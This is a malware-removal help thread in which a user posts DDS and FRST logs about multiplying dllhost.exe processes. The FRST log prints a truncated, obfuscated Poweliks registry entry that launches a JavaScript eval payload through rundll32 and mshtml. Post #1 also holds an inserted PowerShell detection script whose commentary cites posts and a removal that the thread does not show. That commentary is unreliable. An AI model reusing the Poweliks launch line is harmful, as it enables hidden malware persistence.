
Process keeps repeating itself: dllhost.exe *32


  • This topic is locked
10 replies to this topic

#1 icelore

icelore

  • Members
  • 5 posts
  • OFFLINE
  • Local time:03:43 PM

Posted 03 August 2014 - 03:54 AM

Hi all, I'm having an issue that I've never run into before that I'm hoping you can help with. My computer is running fine, I keep it pretty clean, but I have some kind of malware that I can't even find, let alone remove.

 

I have a process that keeps multiplying. Left unchecked, it will multiply to the point where it is using all available memory. I'm talking 300+ instances of the process, and the longer they run, the more memory they use up.

 

Here's a sample image of my Task Manager with a few of the processes just getting started:

[screenshot: Task Manager showing several dllhost.exe *32 processes]

 

I sat down and really picked apart my computer today trying to figure out where it's coming from. MalwareBytes, ADWCleaner, and HitmanPro flagged the usual tracking cookies and a few innocuous things, but that's it. I'm clean in safe mode too. I did enable MalwareBytes to give me real-time notifications today though, to see if I could catch anything, and I found an outbound website connection attempt that coincides with the buildup of the dllhost.exe processes. MWB is blocking the connection attempt, but the processes are still piling up. When MalwareBytes is not blocking this and it goes through (I suppose that's what happens?), the dllhost.exe *32 still builds up, but nothing else happens that I can see. It's just a transfer of information as the internet doesn't open, or redirect, or anything like that.

 

Here's a screen cap of the blocked website:

[screenshot: Malwarebytes notification of the blocked outbound website connection]

 

I have noticed that with the processes, even though they are all labeled the same, there is one "master" process. I can kill them all by hand using End Process via the Task Manager, and regardless of whether there are 3 or 300, I will eventually find one that will take all the rest of them with it. It's a guessing game which one it is though, as they are identical. If I kill them all, they stop for a while, but eventually the website will attempt to connect again and they begin building up.

 

Hopefully someone can help me make this stop! Thank you in advance.

 

~~~

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421  BrowserJavaVersion: 10.60.2
Run by Ice at 3:23:07 on 2014-08-03
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12279.10030 [GMT -5:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uSearch Bar = Preserve
mStart Page = about:blank
mDefault_Page_URL = hxxp://www.google.com
mWinlogon: Userinit = userinit.exe
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
StartupFolder: C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseClientStartup.ccip
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{AB53DCD1-C6D0-437C-BEB9-F17A9907EC0D} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
x64-mStart Page = about:blank
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
.
============= SERVICES / DRIVERS ===============
.
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2011-8-18 55856]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2014-4-17 239616]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2012-7-9 104912]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2012-7-9 123856]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-8-18 13336]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-8-2 1809720]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-8-2 860472]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-12-19 94720]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-2-22 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-8-2 122584]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-8-2 63704]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\Windows\System32\drivers\RtsUStor.sys [2011-8-18 242720]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2011-8-18 295424]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Dragon Age\bin_ship\daupdatersvc.service.exe [2009-12-15 25832]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [2014-4-9 235696]
S3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0;PCDSRVC{1E208CE0-FB7451FF-06020101}_0 - PCDR Kernel Mode Service Helper Driver;C:\Program Files\Dell Support Center\pcdsrvc_x64.pkms [2011-3-18 25072]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-08-03 02:52:19    --------    d-----w-    C:\Windows\ERUNT
2014-08-03 02:51:47    12872    ----a-w-    C:\Windows\System32\bootdelete.exe
2014-08-03 02:41:03    --------    d-----w-    C:\Users\Ice\AppData\Local\CrashDumps
2014-08-03 02:34:16    29160    ----a-w-    C:\Windows\SysWow64\drivers\TrueSight.sys
2014-08-03 02:34:16    --------    d-----w-    C:\ProgramData\RogueKiller
2014-08-03 01:40:40    --------    d-----w-    C:\FRST
2014-08-03 00:30:24    536576    ----a-w-    C:\Windows\SysWow64\sqlite3.dll
2014-08-03 00:26:51    --------    d-----w-    C:\Program Files\HitmanPro
2014-08-03 00:26:32    --------    d-----w-    C:\ProgramData\HitmanPro
2014-08-03 00:24:39    --------    d-----w-    C:\AdwCleaner
2014-08-02 22:21:13    122584    ----a-w-    C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-08-02 22:20:51    91352    ----a-w-    C:\Windows\System32\drivers\mbamchameleon.sys
2014-08-02 22:20:51    63704    ----a-w-    C:\Windows\System32\drivers\mwac.sys
2014-08-02 22:20:51    --------    d-----w-    C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 21:59:39    --------    d-----w-    C:\ProgramData\BitDefender
2014-08-02 21:55:27    --------    d-----w-    C:\Program Files\Lavasoft
2014-08-01 04:32:19    --------    d-----w-    C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files\iTunes
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files\iPod
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files (x86)\iTunes
2014-08-01 04:30:56    --------    d-----w-    C:\Program Files\Bonjour
2014-08-01 04:30:56    --------    d-----w-    C:\Program Files (x86)\Bonjour
2014-07-23 20:29:46    --------    d-----w-    C:\Users\Ice\AppData\Local\Packages
2014-07-23 20:29:46    --------    d-----w-    C:\ProgramData\1d41b52c7ef528a8
2014-07-23 20:29:45    --------    d-----w-    C:\Users\Ice\AppData\Local\Comodo
2014-07-17 15:07:57    --------    d-----w-    C:\ProgramData\Riot Games
2014-07-12 06:26:51    --------    d-----w-    C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 03:37:06    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-12 02:03:42    --------    d-----w-    C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-12 02:02:14    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-12 01:57:21    --------    d-----w-    C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-12 00:45:05    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 20:44:34    --------    d-----w-    C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 17:16:09    --------    d-----w-    C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 14:36:06    --------    d-----w-    C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 14:35:33    --------    d-----w-    C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 14:34:04    --------    d-----w-    C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 14:32:27    --------    d-----w-    C:\Program Files (x86)\Northern Tale
2014-07-11 14:31:56    --------    d-----w-    C:\Program Files (x86)\Royal Envoy 3
2014-07-11 14:24:00    --------    d-----w-    C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
.
==================== Find3M  ====================
.
2014-07-09 01:39:06    71344    ----a-w-    C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-07-09 01:39:06    699056    ----a-w-    C:\Windows\SysWow64\FlashPlayerApp.exe
2014-05-12 12:25:56    25816    ----a-w-    C:\Windows\System32\drivers\mbam.sys
2014-05-07 20:02:43    98216    ----a-w-    C:\Windows\SysWow64\WindowsAccessBridge-32.dll
.
============= FINISH:  3:24:06.10 ===============
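The "which dllhost.exe is the master" guessing game in the post above can be replaced by reading the process tree: a dllhost.exe whose parent is not another dllhost.exe is a root, and ending it takes its subtree down. The PowerShell below is an added example, not code from this thread, from Malwarebytes, or from FRST. It goes beyond the first post in one way: its second part also scans for the CLSID\...\LocalServer32 persistence that the FRST log in post #3 below reports (rundll32.exe launching a javascript: URL through mshtml,RunHTMLApplication). The registry paths scanned and the regex used are this example's own assumptions; it assumes an elevated PowerShell 2.0 or later prompt on the Windows 7 x64 system described in the DDS log.

```powershell
# Added example, not code from the thread or from any tool mentioned in it.
# Part 1 maps the dllhost.exe process tree so the "master" instance can be
# read off instead of guessed; Part 2 looks for the CLSID LocalServer32
# persistence that the FRST log later in this thread flags.
# Assumes an elevated PowerShell prompt (2.0 or later) on Windows 7 x64.

# --- Part 1: which dllhost.exe is the root of the tree? ---------------------
$procs = @(Get-WmiObject Win32_Process -Filter "Name='dllhost.exe'")
$byPid = @{}
foreach ($p in $procs) { $byPid[$p.ProcessId] = $p }

$report = foreach ($p in $procs) {
    $parentIsDllhost = $byPid.ContainsKey($p.ParentProcessId)
    if ($parentIsDllhost) {
        $parentName = 'dllhost.exe'
    } else {
        # Parent is some other image, or has already exited (orphaned child).
        $parentProc = Get-WmiObject Win32_Process -Filter "ProcessId=$($p.ParentProcessId)"
        if ($parentProc) { $parentName = $parentProc.Name } else { $parentName = '<exited>' }
    }
    New-Object PSObject -Property @{
        PID         = $p.ProcessId
        ParentPID   = $p.ParentProcessId
        ParentName  = $parentName
        # A dllhost whose parent is not another dllhost is a root; ending it
        # takes its whole subtree down, which is what the poster observed.
        IsRoot      = (-not $parentIsDllhost)
        Path        = $p.ExecutablePath
        CommandLine = $p.CommandLine
    }
}

$report | Select-Object PID, ParentPID, ParentName, IsRoot, Path, CommandLine |
    Sort-Object IsRoot -Descending | Format-Table -AutoSize
'{0} dllhost.exe instance(s), {1} root(s)' -f $procs.Count, @($report | Where-Object { $_.IsRoot }).Count

# --- Part 2: CLSID\...\LocalServer32 values that launch script via rundll32 ---
# A legitimate LocalServer32 value points at an executable. A value that runs
# rundll32.exe with a javascript: URL and mshtml,RunHTMLApplication is the
# pattern FRST reported in this thread. Paths and regex are this example's own.
$clsidRoots = 'HKCU:\Software\Classes\CLSID',
              'HKLM:\Software\Classes\CLSID',
              'HKLM:\Software\Classes\Wow6432Node\CLSID'
foreach ($root in $clsidRoots) {
    if (-not (Test-Path $root)) { continue }
    foreach ($key in (Get-ChildItem -Path $root -ErrorAction SilentlyContinue)) {
        $ls = $key.PSPath + '\LocalServer32'
        if (-not (Test-Path $ls)) { continue }
        $cmd = (Get-ItemProperty -Path $ls -ErrorAction SilentlyContinue).'(default)'
        if ($cmd -match 'rundll32.*javascript:|RunHTMLApplication|mshtml') {
            'SUSPICIOUS {0}\LocalServer32 = {1}' -f $key.PSChildName, $cmd
        }
    }
}
```

A root dllhost.exe is not malicious by itself: the normal COM Surrogate is started by the DcomLaunch svchost.exe and will show up with ParentName svchost.exe and IsRoot True. What stands out in this thread is the count, the C:\Windows\SysWOW64 path on a 64-bit system, and a root whose parent has already exited. The script only reports; removal of what it finds was handled in this thread by the Malware Response Team member's FRST instructions, and a hit in Part 2 should be pasted into the reply rather than edited by hand.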
 

 

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 04:09 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  • Local time:03:43 PM

Posted 03 August 2014 - 04:12 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-08-2014
Ran by Ice (administrator) on FROSTBYTE on 03-08-2014 04:10:47
Running from C:\Users\Ice\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\WINDOWS\System32\atiesrxx.exe
(AMD) C:\WINDOWS\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\WINDOWS\System32\taskmgr.exe
(Adobe Systems, Inc.) C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Adobe Systems, Inc.) C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Farbar) C:\Users\Ice\Desktop\FarBar.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [24477056 2014-06-27] (Google)
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...\MountPoints2: {9304d5c0-634a-11e3-95b1-b8ac6fffdb81} - E:\LaunchU3.exe -a
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseClientStartup.ccip ()
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76

FireFox:
========
FF ProfilePath: C:\Users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172
FF Homepage: https://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll No File
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
Error reading preferences. Please check "preferences" file for possible corruption. <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 McComponentHostService; C:\Program Files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-08-03] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)
S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
U3 TrueSight; C:\WINDOWS\SysWOW64\drivers\TrueSight.sys [29160 2014-08-02] ()
S3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0; \??\c:\program files\dell support center\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


